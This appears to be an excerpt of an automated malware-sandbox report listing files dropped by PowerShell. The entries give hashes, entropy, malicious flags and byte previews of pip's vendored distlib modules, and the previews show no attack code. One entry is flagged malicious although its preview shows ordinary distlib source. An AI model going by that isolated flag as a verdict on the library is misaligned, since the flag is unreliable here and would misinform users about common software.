                                                                                                                                                                                                                              SSDEEP:12:icKyfO5bo6X9L0+z6HY8UpAGpaUMelZYBuEBRSw3pw12gk/AhUwfW3Tw:lwE6X7zBHpAGVb8l9k
                                                                                                                                                                                                                              MD5:96FB8B852191F4FB121674B5A9F63D5E
                                                                                                                                                                                                                              SHA1:FE61B185D34222EC5D43B8D8F80DFFA836F84690
                                                                                                                                                                                                                              SHA-256:849285EC51E8A9B9867249DC0EE108356A3F3989033621CE0ED61748C72F8DC7
                                                                                                                                                                                                                              SHA-512:915F1795A8193B1D0526AEDD144551976F4CFDAEA82D5F195EADCBEDB6F30BAB2B4B58FDC9B2743C0B2065E4D95E8CD82D51140794A5D93A2204B8F7232852EC
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.#.# Copyright (C) 2012-2023 Vinay Sajip..# Licensed to the Python Software Foundation under a contributor agreement..# See LICENSE.txt and CONTRIBUTORS.txt..#.import logging..__version__ = '0.3.8'...class DistlibException(Exception):. pass...try:. from logging import NullHandler.except ImportError: # pragma: no cover.. class NullHandler(logging.Handler):.. def handle(self, record):. pass.. def emit(self, record):. pass.. def createLock(self):. self.lock = None...logger = logging.getLogger(__name__).logger.addHandler(NullHandler()).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1252
                                                                                                                                                                                                                              Entropy (8bit):4.826710982482414
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:lK6dtVJj6RP6cKNnaGcyiAqbpRALByOqoG46BrusYo8qFEC1KyWP1jkA3PAN/mbH:s6TPHcKNnlXLBbl6Brl8qiCLWdjk+bb
                                                                                                                                                                                                                              MD5:4487125718C644DEE209C94C274DAF20
                                                                                                                                                                                                                              SHA1:BAA3BDC6DEBF373F2CB819D77D6D538138EEE4B7
                                                                                                                                                                                                                              SHA-256:0A1C7437743E2277C2E7DF9EE8E1FBE01BE6D7DA3CBC75F93D9BC6CC451ACC94
                                                                                                                                                                                                                              SHA-512:4DF40D9E4AD79457FFB089305F1BFBEA84D9A4D86C5BFCB5DC401A89FF1E64A3BD783A945DCEA5E2C27DB2DB0B996A7E27113F5913DD85272FA78A72F5ADAA65
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfq...............................d.d.l.Z.d.Z...G.d...d.e.........Z...d.d.l.m.Z.....e.j...................e.........Z.e.j.....................e...................y.#.e.$.r.....G.d...d.e.j...........................Z.Y..Ew.x.Y.w.)......Nz.0.3.8c...........................e.Z.d.Z.y.)...DistlibExceptionN)...__name__..__module__..__qualname__........MC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/distlib/__init__.pyr....r........s.........r....r....)...NullHandlerc...........................e.Z.d.Z.d...Z.d...Z.d...Z.y.).r....c...........................y...Nr........self..records.... r......handlez.NullHandler.handle..............r....c...........................y.r....r....r....s.... r......emitz.NullHandler.emit....r....r....c...........................d.|._.........y.r....)...lock).r....s.... r......createLockz.NullHandler.createLock....s..........D.Ir....N).r....r....r....r....r....r....r....r....r....r....r........s.....................r....r....)...logging..__v
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):45588
                                                                                                                                                                                                                              Entropy (8bit):5.427471127265394
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:eBo6KKIVK+omUIUyZj5xqTuYKXBonU+8ZqM7GM2k1xHf0QdYnhD1mXc:eBo62omUIU2Ey/VKnms
                                                                                                                                                                                                                              MD5:EF2F1CB026059871A1FF1C2391D4F87A
                                                                                                                                                                                                                              SHA1:0AB47F25FB0139233E3CBCC95E436E385CBD19C5
                                                                                                                                                                                                                              SHA-256:CF140F847007FCC64080DE0D9AC442454EC1D049544A75DA489601F3D41EDFDF
                                                                                                                                                                                                                              SHA-512:AE240E4F1DC4F28C03E6D4FD7321107831CD04C5AC9DE5A4E6A671DC862F8A0D7E45293AAD7F8DA9E32A5903E91E87B1F6D8F176FDAE33053E0FC21C0534A290
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z.e.j...................d.....d.k...r.d.d.l.m.Z...e.f.Z.e.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"..d...Z.d.d.l#Z#d.d.l#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,..e.r.d.d.l#m-Z-..d.d.l.Z.d.d.l/Z/d.d.l0Z1d.d.l2m2Z2..d.d.l3Z3e4Z4d.d.l5m6Z7..d.d.l5m8Z9..n.d.d.l:m.Z...e;f.Z.e;Z.d.d.l:m<Z...d.d.l.Z.d.d.l.Z.d.d.l=m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m"Z"..d.d.l>m%Z%m.Z.m$Z$m.Z.m Z m(Z(m)Z)m*Z*m+Z+m,Z,..e.r.d.d.l>m-Z-..d.d.l?m'Z'm&Z&m!Z!..d.d.l@mAZ...d.d.l>mBZ#..d.d.lCmAZ/..d.d.l1Z1d.d.lDm2Z2..d.d.lEmFZ3..eGZ4d.d.l5m9Z9..e7Z7..d.d.l.mHZHmIZI....d.d.l.mLZM....d.d.l.mOZO..d.d.lRmSZT....eUeTd.........r.eTZSn.d.d.lRmVZW....G.d ..d!eW........ZV..G.d"..d#eT........ZS..d.d$lXmYZY..d.d.lZZZ..e[Z[..e.j...................Z_e.j...................Z`..d.d.lemfZf....d.d3lmmnZn..e.j...................d.d4..d5k...r...e2........j...................Zpn.d.d6lmmpZp....d.d7lqmrZr..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):66010
                                                                                                                                                                                                                              Entropy (8bit):5.267135279533357
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:Gz1+j6ebQAywYOIP4KnXmU8E4e81cb+/xagyAttp1yhKd46xgl/NoyzX8:GzAW7FOJVUbB43cZhKmjlldM
                                                                                                                                                                                                                              MD5:3CD7C9D792032EC77632E75B67F6B0E0
                                                                                                                                                                                                                              SHA1:07CF58ED5D47617C81A7D6AD1B5E326D35412F58
                                                                                                                                                                                                                              SHA-256:3F8DE44F3A1D6FFD63F9A86D184D008552FEEB59644586C41DA72E33329F93A8
                                                                                                                                                                                                                              SHA-512:EE4FC708223817F8333A5BC2B25567D3A4C26287E9BC7B7689E582DD245F2BD389E816BC097289B976B51A1F618DD427E70714CD9037706E4B101D32B5DFFF7C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z ..g.d...Z!..e.jD..................e#........Z$d.Z%d.Z&d.e.d.d.d.e%d.f.Z'd.Z(..G.d...d.e)........Z*..G.d...d.e)........Z+..G.d...d.e)........Z,..G.d...d.e,........Z-..G.d...d.e-........Z...G.d...d.e-........Z/e.Z0e/Z1..G.d...d e)........Z2d%d!..Z3d"..Z4d#..Z5d$..Z6y.)&z.PEP 376 implementation......)...unicode_literalsN.....)...DistlibException..resources)...StringIO)...get_scheme..UnsupportedVersionError)...Metadata..METADATA_FILENAME..WHEEL_METADATA_FILENAME..LEGACY_METADATA_FILENAME)...parse_requirement..cached_property..parse_name_and_version..read_exports..write_exports..CSVReader..CSVWriter)...Distribution..BaseInstalledDistribution..InstalledDistribution..EggInfoDistribution..DistributionPathz.pydist-exports.jsonz.pydist-commands.json..INSTALLER..RECO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):24349
                                                                                                                                                                                                                              Entropy (8bit):5.312128499227015
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:h2T1xInQbokiQ5kpvCeq/WaQQwWizLAiJNEKlr1y6lKppDXVhFrBy9y7Or8:0xfbokmvwzQzciJjApfLrBn7Or8
                                                                                                                                                                                                                              MD5:A6D0BCFB73B35F9EB8C27414B70EA5D7
                                                                                                                                                                                                                              SHA1:F242343624597CC41381D5FAB15B112CDEC19D85
                                                                                                                                                                                                                              SHA-256:96F9C72E1764ECA06AA7197973823F37107F89DC1250FFDF645F120B0CC3F15F
                                                                                                                                                                                                                              SHA-512:75AF5D0336136E3DFBDD52EAECDF6ABF48BE8BF0AEE6C13A431E1201C85ECF8F714166CCA6F725E7116E4B965D5419A723337F5D64393B2107F646DAA7A291A6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf=Q..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.....e.j,..................e.........Z.d.Z.d.Z...G.d...d.e.........Z.y.#.e.$.r...d.d.l.m.Z...Y..Mw.x.Y.w.)......N)...Thread.....)...DistlibException)...HTTPBasicAuthHandler..Request..HTTPPasswordMgr..urlparse..build_opener..string_types)...zip_dir..ServerProxyz.https://pypi.org/pypi..pypic..........................e.Z.d.Z.d.Z.d.Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.....d.d...Z.d...Z...d.d...Z...d.d...Z.d.d...Z.d...Z.d...Z.d.d...Z.y.)...PackageIndexzc. This class represents a package index compatible with PyPI, the Python. Package Index.. s....----------ThIs_Is_tHe_distlib_index_bouNdaRY_$Nc...........................|.x.s...t.........|._.........|.j.............................t.........|.j...........................\...}.}.}.}.}.}.|.s.|.s.|.s.|.d.v.r.t.........d.|.j..................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60141
                                                                                                                                                                                                                              Entropy (8bit):5.309581671495321
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:xW55ygKH5kTS1HvIU6O6odX35O/x7kQHPwAaKRJ:Q1EHvpNkdzacJ
                                                                                                                                                                                                                              MD5:2CF7AE38EC4AA120F4162E1D5352C816
                                                                                                                                                                                                                              SHA1:506B308A0EC90823390F3A1C1911D8D798A27059
                                                                                                                                                                                                                              SHA-256:A3C37DC5EA50A24C1E41E57FBBD853BCD982E1D75BCDCF1CEC2A4C0467D55D8B
                                                                                                                                                                                                                              SHA-512:05C83D6F57F96C09DBBADE13BDEF9E2285265FD03C5B2B0ECAA2F652AC5A78CD3BCD78D7C9A1E2985A6FB008458F490F1703C0528307C4D083D65747C4D6F903
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf7...............................d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m Z m!Z!..d.d.l"m#Z#m$Z$..d.d.l%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-..d.d.l.m/Z/m0Z0..d.d.l1m2Z2m3Z3....e.jh..................e5........Z6..e.jn..................d.........Z8..e.jn..................d.e.jr..........................Z:..e.jn..................d.........Z;d.Z<d+d...Z=..G.d...d.e.........Z>..G.d...d.e?........Z@..G.d...d.e@........ZA..G.d...d.e@........ZB..G.d...d.e?........ZC..G.d...d.e@........ZD..G.d...d.e@........ZE..G.d...d.e@........ZF..G.d ..d!e@........ZG..G.d"..d#e@........ZH..eH..eDd$d%.&........d'.(........ZIeIj...................ZJ..G.d)..d*e?........ZKy.#.e.$.r...d.d.l.Z.Y....]w.x.Y.w.),.....N)...BytesIO.....)...DistlibException)...urljoin..urlparse..urlunparse..url2pathname..pathname2url..queue..quote..unescape..build_opener..HTTPRedirectHandler..text_type..Req
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15108
                                                                                                                                                                                                                              Entropy (8bit):5.412698855710061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:CKwUEHHlshxyA+yWFv/NF4q8X7LzhDFGFqq/TEp1tLZvV5ScQJnVi92TbPziQ1:7wUEnSyA+yWFvYP18FqqY98V5POQ1
                                                                                                                                                                                                                              MD5:A3D1A4124AAC1FFAF7D535DF46E39169
                                                                                                                                                                                                                              SHA1:718EB7A1E645B665525416BCCC5059011404805D
                                                                                                                                                                                                                              SHA-256:31EC6006BC3567F564EDCA9A3571A2B95B2CA2AB3FDCAFEAD56E83B4A6870CDD
                                                                                                                                                                                                                              SHA-512:BF8EB1100BB5BF3F379D576A63460566BC696558AAEE378A83A3D97D8FBA4ACA1BBE4F9E46D5CA8BA5A8C8642B9AB79186FC1BCF8C578105BF2461473F48FB26
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfX7........................@.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.g.Z...e.j...................e.........Z...e.j ..................d.e.j"..........................Z...e.j ..................d.e.j"..................e.j&..................z...........Z.e.j*..................d.d...Z...G.d...d.e.........Z.y.).zu.Class representing the list of files in a distribution...Equivalent to distutils.filelist, but fixes some problems.......N.....)...DistlibException)...fsdecode)...convert_path..Manifestz.\\w*.z.#.*?(?=.)|.(?=$).....c.....................n.....e.Z.d.Z.d.Z.d.d...Z.d...Z.d...Z.d...Z.d.d...Z.d...Z.d...Z.d...Z.....d.d...Z.....d.d...Z.....d.d...Z.d...Z.y.).r....z.. A list of files built by exploring the filesystem and filtered by applying various. patterns to what we find there.. Nc.....................".....t.........j...................j...................t.........j...................j...................|.x.s...t.......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7665
                                                                                                                                                                                                                              Entropy (8bit):5.25933653469168
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:TMJ1w7fcx+m57r7VtOms0pc5KfCHH/LV7M8ZF5jfSs1G6QFaakVjVCAIn:TMJm7w7bOspRfCn/LVVZFNfSX6FadAIn
                                                                                                                                                                                                                              MD5:C5B02B9F665D17DA5A0161934EA9C7C0
                                                                                                                                                                                                                              SHA1:4F2A2226D5BEB0CF79DED2CABF6EBDA292161F27
                                                                                                                                                                                                                              SHA-256:53320ADD241E2C1BA9025A328673B88D4EC7777AB313B38119B731631003EED2
                                                                                                                                                                                                                              SHA-512:FD5917A016539CD74D0F2AD1C7A7B16CC13689925211B00C2A71E2F1EBC7DAD7A25070D3E5551BC79AC9A8DB4014ABEC78215E0D88C2B32914E9AFF92978284A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.g.Z...e.j...................d.........Z.d.d.h.Z.d...Z.d...Z.d...Z...G.d...d.e.........Z...e.j...................d.........Z.d...Z...e.........Z.[...e.........Z.d.d...Z.y.).zG.Parser for the environment markers micro-language defined in PEP 508.......N.....)...string_types)...in_venv..parse_marker)...LegacyVersion..interpretz<((\d+(\.\d+)*\w*)|\'(\d+(\.\d+)*\w*)\'|\"(\d+(\.\d+)*\w*)\")..python_version..python_full_versionc.....................6.....t.........|.t.................x.r...|.t.........v.S...N)...isinstancer......_VERSION_MARKERS)...ss.... .LC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/distlib/markers.py.._is_version_markerr........s..........a....&..@.1.0@.+@..@.....c.....................6.....t.........|.t.................r.|.s.y.|.d.....d.v.S.).NFr......'").r....r....)...os.... r......_is_literalr....#...s..........a....&.a.......Q.4.5.=...r
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):41782
                                                                                                                                                                                                                              Entropy (8bit):5.378290235181271
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:fFYBtwf3L76wtBI3hjFHKF3vDktkRajl1HPXGialo4NGddcNq6:9itw/9tGRhHA+kCv2iOo16
                                                                                                                                                                                                                              MD5:B4AA6335B61E49DEABD4F2493E9EDFB0
                                                                                                                                                                                                                              SHA1:8CAA2E7144EED62F7C5C65F4838768172B29F4C0
                                                                                                                                                                                                                              SHA-256:ED2C261A3BD2A3F9F1D2BD0BD776AC46CE0672A93CCE1CD7D8D440E29EF4F140
                                                                                                                                                                                                                              SHA-512:984237A46CE2599CDD1B37D3578673D1CFF0FC7D097DD552A821E3F43A56C687A70339EEA29A77E6A4E0A1706C5F73965D64C25B0B48E5AB10473258871793F1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.....e.j0..................e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.g.d...Z.d.Z d.Z!..e.jD..................d.........Z#..e.jD..................d.........Z$d.Z%d.Z&d.Z'd.Z(d.Z)d.Z*d.Z+e*d.z...Z,d Z-d!Z.e,e.z...Z/..e0........Z1e1je..................e%..........e1je..................e&..........e1je..................e(..........e1je..................e*..........e1je..................e,..........e1je..................e/............e.jD..................d"........Z3d#..Z4d$..Z5e1D...c.i.c.]#..}.|.jm..........................jo..................d%d&........|....%..c.}.Z8e8js..........................D.....c.i.c.]...\...}.}.|.|.......c.}.}.Z:d'Z;d(Z<d)Z=d*Z>d+Z?d,Z@d-ZA..eB........ZC..e.jD..................d.........ZDd7d/..ZE..G.d0..d1eB........ZFd2ZGd3ZH
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17308
                                                                                                                                                                                                                              Entropy (8bit):4.930792998019108
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:krlJy/tFNWi8Wm7Pb91g5sBsETdJ1MtGrpEfU:krLylUx1UuPT3hNEfU
                                                                                                                                                                                                                              MD5:48420BE12A6013AFEE85199008052F49
                                                                                                                                                                                                                              SHA1:8D99A85C2F6B23DB0124DB39DFA907BDFD352702
                                                                                                                                                                                                                              SHA-256:104FD6B26E8211114A5AB30226A0642BC5EE51391435791870AF0637F94F19D0
                                                                                                                                                                                                                              SHA-512:4FAFB641F7CAFFD530291A504F9181D9EAC2A3F6C0AF88B64A2F161EA152C25FC4837B37B7AE98F29FDA15A30D05DA0E81474CEB60B40C6FD4FF6BFF56C4AD6E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfD*..............................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.....e.j ..................e.........Z.d.a...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...e.d.........e.e.j8..................e.i.Z.....d.d.l.Z.e.e.e.jD..................<...e.e.e.jF..................<...e.e.e.jH..................<...[.d...Z&i.Z'd...Z(..e.jR....................e*d.................Z+d...Z,y.#.e $.r...d.d.l!Z.Y..]w.x.Y.w.#.e e%f.$.r...Y..<w.x.Y.w.)......)...unicode_literalsN.....)...DistlibException)...cached_property..get_cache_base..Cachec.....................,.......e.Z.d.Z.d...f.d...Z.d...Z.d...Z...x.Z.S.)...ResourceCachec............................|..1t.........j...................j...................t.................t.........d.................}.t.........t.........|.....|...........y.).Nz.resource-cache)...os..path..joinr......st
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):19563
                                                                                                                                                                                                                              Entropy (8bit):5.292428766948781
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Paqvouk6bvzngpWujlbdPuXByI/kyMjl8pOL:Cqpk6bvzngpWsjqpOL
                                                                                                                                                                                                                              MD5:8D31828506D59C9C946900502C9BD465
                                                                                                                                                                                                                              SHA1:46D5C92E81DAFEF7BBA7E059412EC34896B62A32
                                                                                                                                                                                                                              SHA-256:A2FD46C446F116FC1FFB01835A64FFD4ED35B40B12BE2F1D232DCE0C00CE8DC6
                                                                                                                                                                                                                              SHA-512:5141C78E98AD0B7DA1A2CBA2C7E63AF2B24B6B5DEEDFB51C52A2FB1D17D97C92502108E3775FCF97822F364E63D9A482A2C2EF8D0F4BCD05C04FB5F3339C4B71
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.G..............................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.j...................e.........Z.d.j5..........................Z...e.j8..................d.........Z.d.Z.d...Z.e.Z ..G.d...d.e!........Z"y.)......)...BytesION)...ZipInfo.....)...sysconfig..detect_encoding..ZipFile)...finder)...FileOperator..get_export_entry..convert_path..get_executable..get_platform..in_venva.....<?xml version="1.0" encoding="UTF-8" standalone="yes"?>.<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">. <assemblyIdentity version="1.0.0.0". processorArchitecture="X86". name="%s". type="win32"/>.. Identify the application security requirements. -->. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">. <security>. <requestedPrivileges>. <requestedExecutionLevel level="asInvoker" uiAccess="false"/>. </requestedPrivileges>. </security>. </trustInfo>.</assembly>s....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):88239
                                                                                                                                                                                                                              Entropy (8bit):5.162394404783332
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:2DPO8OS6IYWLn7mkVIjuHASBgKxE1OJL7l1nQZ+E7:2DPOiYWzihKfqOJXvnQt7
                                                                                                                                                                                                                              MD5:8EBB4734F6C253D361B58AE2042149BE
                                                                                                                                                                                                                              SHA1:11352EEF8A06B8D373E267A72E91C7A9ABDDA3B4
                                                                                                                                                                                                                              SHA-256:D2FB14C93F4495F9D7E63419657614F611E6AE33640D25E0466749D1F6DFCC24
                                                                                                                                                                                                                              SHA-512:0D74A942E3C21FCCF4B4A949F83189BAE9352E2DB81C6737C24041B00AA6D85985465A89017ED9779347D7B1C20D097E2CE11C94F589C3B180288E93ED0EEA41
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................&.....d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/....e.j`..................e1........Z2..e.jf..................d.........Z4..e.jf..................d.........Z5..e.jf..................d.........Z6..e.jf..................d.........Z7..e.jf..................d.........Z8..e.jf..................d.........Z9..e.jf..................d.........Z:..e.jf..................d.........Z;d...Z<d...Z=d...Z>d...Z?d...Z@did...ZAd...ZBd...ZCd...ZDe.j...................d...........ZFe.j...................d...........ZGe.j...................djd...........ZH..G.d...d.eI........ZJd...ZK..G.d...d.eI........ZLd ..ZM..G.d!..d"eI........ZN..e.jf..................d#e.j...........................ZPd$..ZQdkd%..ZRd&..ZSd'..ZTd(..ZUd)..ZVd*..ZW..e.jf........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):30349
                                                                                                                                                                                                                              Entropy (8bit):5.220718968322322
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:+PQdXRCzDPEGBPs9wldU6yOmkJgDq+ywfd:+PnPzPs9whyOmkJUq+ywfd
                                                                                                                                                                                                                              MD5:5FF76D296AC5287A808750C8725B8352
                                                                                                                                                                                                                              SHA1:E005526590C1E01ACA1236FE73AA6297D12069B2
                                                                                                                                                                                                                              SHA-256:83E658438E84F516DAC39DC996740891C76B22FF34E1B3273B8B99146DCDA5A9
                                                                                                                                                                                                                              SHA-512:E05EBB6AA93538736333F2D254A68C7F16F6347DFB367DE5F7D943E3DD8BF3EB006D94BA78B7C181A8649A09C8D015E1A0EEC6F7079317295009E904DDDB153F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.\..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z...e.j...................e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...e.j ..................d.e.j"..........................Z.d...Z.e.Z...G.d...d.e.........Z.d...Z...G.d...d.e.........Z...e.j ..................d.........d.f...e.j ..................d.........d.f...e.j ..................d.........d.f...e.j ..................d.........d.f...e.j ..................d.........d.f...e.j ..................d.........d.f...e.j ..................d.........d.f...e.j ..................d ........d!f...e.j ..................d"........d#f...e.j ..................d$........d%f.f.Z...e.j ..................d&........d.f...e.j ..................d'........d.f...e.j ..................d(........d.f...e.j ..................d.........d.f...e.j ..................d)........d.f.f.Z...e.j ..................d*........Z.d+..Z.d,..Z...e.j ..................d-e.j"..........................Z.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):51844
                                                                                                                                                                                                                              Entropy (8bit):5.274440157778884
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:XCPYUtbRdYIZ1p3Dlk6cxk1wRjq2Vdx5Ckzlf3MIPqKe5RT:0vppOxq2Vdx5CsfcIyKe5p
                                                                                                                                                                                                                              MD5:99CC367D23A9D56D98DE7D3F929DE6FB
                                                                                                                                                                                                                              SHA1:552E87F2C2C7E72E962219F1BC970CD1937EFD95
                                                                                                                                                                                                                              SHA-256:3CCBE5E760274A86515F03B56CF5BD837CF8F600EDAFB91DD401072098150066
                                                                                                                                                                                                                              SHA-512:875511092FD45A4F489680DCFD8FAE34B3FF0CA38222E3011D6AAB079C334F4EDDE36C5A70245E321035164CA5AA7E82690E05692D2BF2527D56FBD3C7CF110A
                                                                                                                                                                                                                              Malicious:false
